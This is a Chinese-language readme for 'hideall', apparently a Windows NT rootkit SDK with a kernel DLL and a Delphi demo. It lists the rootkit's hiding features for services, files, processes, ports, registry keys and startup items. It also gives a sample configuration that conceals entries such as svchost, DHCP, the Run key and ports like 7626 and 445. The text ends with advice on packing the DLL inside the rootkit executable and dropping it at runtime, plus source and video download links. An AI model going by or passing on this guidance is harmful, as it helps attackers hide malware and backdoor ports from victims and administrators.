功能：

　１．隐藏服务　２．隐藏文件　３．隐藏进程　４．隐藏ＴＣＰ／ＵＤＰ端口　5.隐藏注册表　６．隐藏菜单启动项　

　hideall.dll　是内核代码，只有３０Ｋ，Hdemo.exe是ＲＯＯＴＫＩＴ的ＤＥＬＰＨＩ演示代码，在ＤＥＬＰＨＩ６下能编译调试．

　

　文件列表:

             hideall.dll , hideall.ini,hdemo.exe

   hideall.ini 书写注意事项：

[Settings]
FileMappingName=_.-=[hideall]=-._
ServiceName=hideall
ServiceDisplayName=hideall service
ServiceDescription=hideall NT rootkit

／／[Settings] 中每一项都必须设置

[Hidden Table]
hideme*

／／[Hidden Table]中设置要隐藏的文件名，大多数情况下要用通配符 *

[Hidden Processes]
hideme*
svchost*

／／[Hidden Processes]填写要隐藏的进程名，大多数情况下要用通配符 *

[Hidden Services]
hideme*
DHCP*

//[Hidden Services]填写要隐藏的服务名，大多数情况下要用通配符 *

[Hidden RegKeys]
hideme
LEGACY_hideme
Run
　

//[Hidden RegKeys]填写要隐藏的注册表键名，大多数情况下要用通配符 *

[Hidden RegValues]
AUState*
　

//[Hidden RegKeys]填写要隐藏的注册表键值名，大多数情况下要用通配符 *

[Startup Run]
　

//[Startup Run]填写要隐藏的启动项里的启动项名称，大多数情况下要用通配符 *

[Hidden Ports]
TCPI:7626,1241,445,135
TCPO:445,139
UDP:445,138,500

//[Hidden Ports]填写要隐藏的协议端口号,用 , 隔开

ROOTKIT 开发建议：

       1． xv.pid不要改名，最好不要添加到文件隐藏项里

　　 2.　参考HDEMO.DPR的写法，不要调乱代码的执行顺序

　　 3.  最后ＲＯＯＴＫＩＴ写成以后最好把hideall.dll一起压在ＲＯＯＴＫＩＴ的主执行exe里，运行时释放

ＳＤＫ源代码下载：

　　　HideAll_SDK_SRC.RAR

技术录象下载:

         HideAll_SDK_SRC_video.RAR